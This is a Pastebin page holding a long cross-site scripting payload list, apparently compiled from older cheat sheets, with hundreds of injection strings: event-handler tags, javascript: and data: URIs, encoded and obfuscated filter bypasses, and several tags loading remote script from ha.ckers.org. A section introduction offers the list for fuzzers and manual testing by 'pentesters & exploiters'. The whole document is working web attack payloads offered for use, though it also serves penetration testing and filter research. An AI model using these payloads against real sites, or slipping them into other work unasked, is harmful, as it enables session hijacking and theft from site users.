Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- "><img src=x onerror=prompt(1)>
- [Click here](javascript:alert(1))
- "></script><svg/onload=alert("XSS")>
- <iframe src="http://businessinfo.co.uk/labs/xss/xss.swf"></iframe>
- '|alert('xss')|'
- +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
- data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTUE9TRUQvKTwvc2NyaXB0Pg==#
- %3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E
- <iframe src=http://test.de>
- <iframe src=http://test.de>
- PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+
- "><img src=x onclick=prompt(1)>
- "><img src=x ondblclick=prompt(1)>
- "><img src=x ondrag=prompt(1)>
- "><img src=x ondragend=prompt(1)>
- "><img src=x ondragenter=prompt(1)>
- "><img src=x ondragleave=prompt(1)>
- "><img src=x ondragover=prompt(1)>
- "><img src=x ondragstart=prompt(1)>
- "><img src=x ondrop=prompt(1)>
- "><img src=x onmousedown=prompt(1)>
- "><img src=x onmousemove=prompt(1)>
- "><img src=x onmouseout=prompt(1)>
- "><img src=x onmouseover=prompt(1)>
- "><img src=x onmouseup=prompt(1)>
- "><img src=x onmousewheel=prompt(1)>
- "><img src=x onscroll=prompt(1)>
- "><img src=x onwheel=prompt(1)>
- Her
- -----------------------------------------------
- “ autofocusonfocus=alert(1)//
- “;alert(1)//
- ";document.body.addEventListener("DOMActivate",alert(1))//
- ";document.body.addEventListener("DOMActivate",prompt(1))//
- ";document.body.addEventListener("DOMActivate",confirm(1))//
- javascript:alert(1)//
- javascript:alert(1)
- javaSCRIPT:alert(1)
- JaVaScRipT:alert(1)
- javas	cript:\u0061lert(1);
- javascript:\u0061lert(1)
- javascript:alert(document.cookie) // AsharJaved
- -alert(1)-
- -prompt(1)-
- -confirm(1)-
- Der
- ----------------------------------------------------
- "><img srx=x onerror=alert(1)>
- <script>alert(1)</script>
- <scr<script>ipt>alert(99)</scr<script>ipt>
- <a href=â€javascript:alert(1)â€>Clickme</a>
- <img/src=aaa.jpg onerror=prompt(1);>
- <video src=x onerror=prompt(1);>
- <audio src=x onerror=prompt(1);>
- <iframesrc="javascript:alert(2)">
- <iframe src="http://businessinfo.co.uk/labs/xss/xss.swf"></iframe>
- <iframe/src="data:text/html;	base64
,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">.
- <embed/src=//goo.gl/nlX0P>
- <form action="Javascript:alert(1)"><input type=submit>
- <formaction='data:text/html,<script>alert(1)</script>'><button>CLICK
- <table background=javascript:alert(1)></table> // Works on Opera 10.5 and IE6
- <video poster=javascript:alert(1)//></video> // Works Upto Opera 10.5
- <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
- <object/data=//goo.gl/nlX0P?
- <isindexformaction="javascript:alert(1)" type=image>
- <input type="image" formaction=JaVaScript:alert(0)>
- <form><button formaction=javascript:alert(1)>CLICKME
- <isindex action="javascript:alert(1)" type=image>
- <isindex action=j	a	vas	c	r	ipt:alert(1) type=image>
- <isindex action=data:text/html, type=image>
- <applet code="javascript:confirm(document.cookie);"> // Firefox Only
- <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>
- <svg/onload=prompt(1);>
- <marquee/onstart=confirm(2)>/
- <body onload=prompt(1);>
- <select autofocus onfocus=alert(1)>
- <textarea autofocus onfocus=alert(1)>
- <keygen autofocus onfocus=alert(1)>
- <video><source onerror="javascript:alert(1)">
- <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
- <body language=vbsonload=alert-1 // Works with IE8
- <command onmouseover ="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x69\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command> // Works with IE8
- <q/oncut=open()>
- <q/oncut=alert(1)> // Useful in-case of payload restrictions.
- <a onmouseover="javascript:window.onerror=alert;throw 1>
- <img src=x onerror="javascript:window.onerror=alert;throw 1">
- <body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29';
- <img style="xss:expression(alert(0))"> // Works upto IE7.
- <div style="color:rgb(''�x:expression(alert(1))"></div> // Works upto IE7.
- <style>#test{x:expression(alert(/XSS/))}</style> // Works upto IE7
- <a onmouseover=location=’javascript:alert(1)>click
- <body onfocus="location='javascrpt:alert(1) >123
- <meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P">
- <meta http-equiv="refresh" content="0;javascript:alert(1)"/>
- <svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg> // By @secalert
- <svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/> // By Mario
- <svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(2)//"></svg> // By @secalert
- <meta content="
 1 
;JAVASCRIPT: alert(1)" http-equiv="refresh"/>
- <math><a xlink:href="//jsfiddle.net/t846h/">click // By Ashar Javed
- <svg><script>alert(/1/)</script> // Works With All Browsers
- <svg><script>alert( 1) // Works with Opera Only
- ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
- alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
- '';!--"<XSS>=&{()}
- <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
- <IMG SRC="javascript:alert('XSS');">
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC=JaVaScRiPt:alert('XSS')>
- <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
- <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG SRC=# onmouseover="alert('xxs')">
- <IMG onmouseover="alert('xxs')">
- <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
- <IMG SRC=javascript:alert(
- 'XSS')>
- <IMG SRC=javascript:alert('XSS')>
- <IMG SRC="jav	ascript:alert('XSS');">
- <IMG SRC="jav
ascript:alert('XSS');">
- <IMG SRC="jav
ascript:alert('XSS');">
- <IMG SRC="  javascript:alert('XSS');">
- <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
- <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <<SCRIPT>alert("XSS");//<</SCRIPT>
- <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
- <SCRIPT SRC=//ha.ckers.org/.j>
- <IMG SRC="javascript:alert('XSS')"
- <iframe src=http://ha.ckers.org/scriptlet.html <
- \";alert('XSS');//
- </TITLE><SCRIPT>alert("XSS");</SCRIPT>
- <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
- <BODY BACKGROUND="javascript:alert('XSS')">
- <IMG DYNSRC="javascript:alert('XSS')">
- <IMG LOWSRC="javascript:alert('XSS')">
- <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
- <IMG SRC="livescript:[code]">
- <BODY ONLOAD=alert('XSS')>
- <BGSOUND SRC="javascript:alert('XSS');">
- <BR SIZE="&{alert('XSS')}">
- <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
- <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
- <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
- <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
- <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
- <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
- <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
- exp/*<A STYLE='no\xss:noxss("*//*");
- xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
- <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
- <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
- <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
- <XSS STYLE="xss:expression(alert('XSS'))">
- <XSS STYLE="behavior: url(xss.htc);">
- ¼script¾alert(¢XSS¢)¼/script¾
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
- <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
- <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
- <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
- <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
- <TABLE BACKGROUND="javascript:alert('XSS')">
- <TABLE><TD BACKGROUND="javascript:alert('XSS')">
- <DIV STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
- <DIV STYLE="background-image: url(javascript:alert('XSS'))">
- <DIV STYLE="width: expression(alert('XSS'));">
- <!--[if gte IE 4]>
- <SCRIPT>alert('XSS');</SCRIPT>
- <![endif]-->
- <BASE HREF="javascript:alert('XSS');//">
- <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
- EMBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).:
- org/xss.swf" AllowScriptAccess="always"></EMBED>
- <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
- a="get";
- b="URL(\"";
- c="javascript:";
- d="alert('XSS');\")";
- eval(a+b+c+d);
- <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
- <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
- <XML SRC="xsstest.xml" ID=I></XML>
- <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <HTML><BODY>
- <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
- <?import namespace="t" implementation="#default#time2">
- <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>">
- </BODY></HTML>
- <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
- <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
- <? echo('<SCR)';
- echo('IPT>alert("XSS")</SCRIPT>'); ?>
- <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
- Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
- <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
- <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
- <A HREF="http://66.102.7.147/">XSS</A>
- <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
- <A HREF="http://1113982867/">XSS</A>
- <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
- <A HREF="http://0102.0146.0007.00000223/">XSS</A>
- <A HREF="h
- tt p://6 6.000146.0x7.147/">XSS</A>
- <A HREF="//www.google.com/">XSS</A>
- <A HREF="//google">XSS</A>
- <A HREF="http://ha.ckers.org@google">XSS</A>
- <A HREF="http://google:ha.ckers.org">XSS</A>
- <A HREF="http://google.com/">XSS</A>
- _________ _________.__ __ _________ .__ __ .__
- \_ ___ \_______ ____ ______ ______ / _____/|__|/ |_ ____ / _____/ ___________|__|______/ |_|__| ____ ____
- / \ \/\_ __ \/ _ \/ ___// ___/ \_____ \ | \ __\/ __ \ \_____ \_/ ___\_ __ \ \____ \ __\ |/ \ / ___\
- \ \____| | \( <_> )___ \ \___ \ / \| || | \ ___/ / \ \___| | \/ | |_> > | | | | \/ /_/ >
- \______ /|__| \____/____ >____ > /_______ /|__||__| \___ > /_______ /\___ >__| |__| __/|__| |__|___| /\___ /
- \/ \/ \/ \/ \/ \/ \/ |__| \//_____/
- Information:
- A lot of people asked us regarding our cross site scripting pentest sheet for a fuzzer or own scripts. To have
- some good results you can use the following list with automatic scripts, software or for manually pentesting. This
- list goes out to all friends, nerds, pentester & exploiters. Please continue the List and we will update it soon.
- Note: This is a technical attack sheet for cross site penetrationtests.
- Cross Site Scripting Strings with TAG:
- <meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
- <SCRIPT>document.cookie=true;</SCRIPT>
- <IMG SRC="jav ascript:document.cookie=true;">
- <IMG SRC="javascript:document.cookie=true;">
- <IMG SRC="  javascript:document.cookie=true;">
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
- <SCRIPT>document.cookie=true;//<</SCRIPT>
- <SCRIPT <B>document.cookie=true;</SCRIPT>
- <IMG SRC="javascript:document.cookie=true;">
- <iframe src="javascript:document.cookie=true;>
- <SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
- </TITLE><SCRIPT>document.cookie=true;</SCRIPT>
- <INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
- <BODY BACKGROUND="javascript:document.cookie=true;">
- <BODY ONLOAD=document.cookie=true;>
- <IMG DYNSRC="javascript:document.cookie=true;">
- <IMG LOWSRC="javascript:document.cookie=true;">
- <BGSOUND SRC="javascript:document.cookie=true;">
- <BR SIZE="&{document.cookie=true}">
- <LAYER SRC="javascript:document.cookie=true;"></LAYER>
- <LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
- <STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
- ¼script¾document.cookie=true;¼/script¾
- <IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
- <FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
- <TABLE BACKGROUND="javascript:document.cookie=true;">
- <TABLE><TD BACKGROUND="javascript:document.cookie=true;">
- <DIV STYLE="background-image: url(javascript:document.cookie=true;)">
- <DIV STYLE="background-image: url(javascript:document.cookie=true;)">
- <DIV STYLE="width: expression(document.cookie=true);">
- <STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
- <IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
- <CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
- exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'>
- <STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
- <STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
- <STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
- <SCRIPT>document.cookie=true;</SCRIPT>
- <BASE HREF="javascript:document.cookie=true;//">
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
- <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
- <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
- <? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
- <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
- <a href="javascript#document.cookie=true;">
- <div onmouseover="document.cookie=true;">
- <img src="javascript:document.cookie=true;">
- <img dynsrc="javascript:document.cookie=true;">
- <input type="image" dynsrc="javascript:document.cookie=true;">
- <bgsound src="javascript:document.cookie=true;">
- &<script>document.cookie=true;</script>
- &{document.cookie=true;};
- <img src=&{document.cookie=true;};>
- <link rel="stylesheet" href="javascript:document.cookie=true;">
- <img src="mocha:document.cookie=true;">
- <img src="livescript:document.cookie=true;">
- <a href="about:<script>document.cookie=true;</script>">
- <body onload="document.cookie=true;">
- <div style="background-image: url(javascript:document.cookie=true;);">
- <div style="behaviour: url([link to code]);">
- <div style="binding: url([link to code]);">
- <div style="width: expression(document.cookie=true;);">
- <style type="text/javascript">document.cookie=true;</style>
- <object classid="clsid:..." codebase="javascript:document.cookie=true;">
- <style><!--</style><script>document.cookie=true;//--></script>
- <<script>document.cookie=true;</script>
- <script>document.cookie=true;//--></script>
- <!-- -- --><script>document.cookie=true;</script><!-- -- -->
- <img src="blah"onmouseover="document.cookie=true;">
- <img src="blah>" onmouseover="document.cookie=true;">
- <xml src="javascript:document.cookie=true;">
- <xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
- <div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
- Cross Site Scripting Strings with close TAG:
- >"<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
- >"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
- >"<SCRIPT>document.cookie=true;</SCRIPT>
- >"<IMG SRC="jav ascript:document.cookie=true;">
- >"<IMG SRC="javascript:document.cookie=true;">
- >"<IMG SRC="  javascript:document.cookie=true;">
- >"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
- >"<SCRIPT>document.cookie=true;//<</SCRIPT>
- >"<SCRIPT <B>document.cookie=true;</SCRIPT>
- >"<IMG SRC="javascript:document.cookie=true;">
- >"<iframe src="javascript:document.cookie=true;>
- >"<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
- >"</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
- >"<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
- >"<BODY BACKGROUND="javascript:document.cookie=true;">
- >"<BODY ONLOAD=document.cookie=true;>
- >"<IMG DYNSRC="javascript:document.cookie=true;">
- >"<IMG LOWSRC="javascript:document.cookie=true;">
- >"<BGSOUND SRC="javascript:document.cookie=true;">
- >"<BR SIZE="&{document.cookie=true}">
- >"<LAYER SRC="javascript:document.cookie=true;"></LAYER>
- >"<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
- >"<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
- >"¼script¾document.cookie=true;¼/script¾
- >"<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
- >"<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
- >"<TABLE BACKGROUND="javascript:document.cookie=true;">
- >"<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
- >"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
- >"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
- >"<DIV STYLE="width: expression(document.cookie=true);">
- >"<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
- >"<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
- >"<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
- >"exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'>
- >"<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
- >"<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
- >"<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
- >"<SCRIPT>document.cookie=true;</SCRIPT>
- >"<BASE HREF="javascript:document.cookie=true;//">
- >"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
- >"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- >"<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
- >"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
- >"<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
- >"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
- >"<a href="javascript#document.cookie=true;">
- >"<div onmouseover="document.cookie=true;">
- >"<img src="javascript:document.cookie=true;">
- >"<img dynsrc="javascript:document.cookie=true;">
- >"<input type="image" dynsrc="javascript:document.cookie=true;">
- >"<bgsound src="javascript:document.cookie=true;">
- >"&<script>document.cookie=true;</script>
- >"&{document.cookie=true;};
- >"<img src=&{document.cookie=true;};>
- >"<link rel="stylesheet" href="javascript:document.cookie=true;">
- >"<img src="mocha:document.cookie=true;">
- >"<img src="livescript:document.cookie=true;">
- >"<a href="about:<script>document.cookie=true;</script>">
- >"<body onload="document.cookie=true;">
- >"<div style="background-image: url(javascript:document.cookie=true;);">
- >"<div style="behaviour: url([link to code]);">
- >"<div style="binding: url([link to code]);">
- >"<div style="width: expression(document.cookie=true;);">
- >"<style type="text/javascript">document.cookie=true;</style>
- >"<object classid="clsid:..." codebase="javascript:document.cookie=true;">
- >"<style><!--</style><script>document.cookie=true;//--></script>
- >"<<script>document.cookie=true;</script>
- >"<script>document.cookie=true;//--></script>
- >"<!-- -- --><script>document.cookie=true;</script><!-- -- -->
- >"<img src="blah"onmouseover="document.cookie=true;">
- >"<img src="blah>" onmouseover="document.cookie=true;">
- >"<xml src="javascript:document.cookie=true;">
- >"<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
- >"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
- Cross Site Scripting Strings with negative value & TAG:
- -1<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
- -1<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
- -1<SCRIPT>document.cookie=true;</SCRIPT>
- -1<IMG SRC="jav ascript:document.cookie=true;">
- -1<IMG SRC="javascript:document.cookie=true;">
- -1<IMG SRC="  javascript:document.cookie=true;">
- -1<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
- -1<SCRIPT>document.cookie=true;//<</SCRIPT>
- -1<SCRIPT <B>document.cookie=true;</SCRIPT>
- -1<IMG SRC="javascript:document.cookie=true;">
- -1<iframe src="javascript:document.cookie=true;>
- -1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
- -1</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
- -1<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
- -1<BODY BACKGROUND="javascript:document.cookie=true;">
- -1<BODY ONLOAD=document.cookie=true;>
- -1<IMG DYNSRC="javascript:document.cookie=true;">
- -1<IMG LOWSRC="javascript:document.cookie=true;">
- -1<BGSOUND SRC="javascript:document.cookie=true;">
- -1<BR SIZE="&{document.cookie=true}">
- -1<LAYER SRC="javascript:document.cookie=true;"></LAYER>
- -1<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
- -1<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
- -1¼script¾document.cookie=true;¼/script¾
- -1<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
- -1<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
- -1<TABLE BACKGROUND="javascript:document.cookie=true;">
- -1<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
- -1<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
- -1<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
- -1<DIV STYLE="width: expression(document.cookie=true);">
- -1<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
- -1<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
- -1<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
- -1exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'>
- -1<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
- -1<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
- -1<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
- -1<SCRIPT>document.cookie=true;</SCRIPT>
- -1<BASE HREF="javascript:document.cookie=true;//">
- -1<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
- -1<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- -1<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
- -1<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
- -1<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
- -1<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
- -1<a href="javascript#document.cookie=true;">
- -1<div onmouseover="document.cookie=true;">
- -1<img src="javascript:document.cookie=true;">
- -1<img dynsrc="javascript:document.cookie=true;">
- -1<input type="image" dynsrc="javascript:document.cookie=true;">
- -1<bgsound src="javascript:document.cookie=true;">
- -1&<script>document.cookie=true;</script>
- -1&{document.cookie=true;};
- -1<img src=&{document.cookie=true;};>
- -1<link rel="stylesheet" href="javascript:document.cookie=true;">
- -1<img src="mocha:document.cookie=true;">
- -1<img src="livescript:document.cookie=true;">
- -1<a href="about:<script>document.cookie=true;</script>">
- -1<body onload="document.cookie=true;">
- -1<div style="background-image: url(javascript:document.cookie=true;);">
- -1<div style="behaviour: url([link to code]);">
- -1<div style="binding: url([link to code]);">
- -1<div style="width: expression(document.cookie=true;);">
- -1<style type="text/javascript">document.cookie=true;</style>
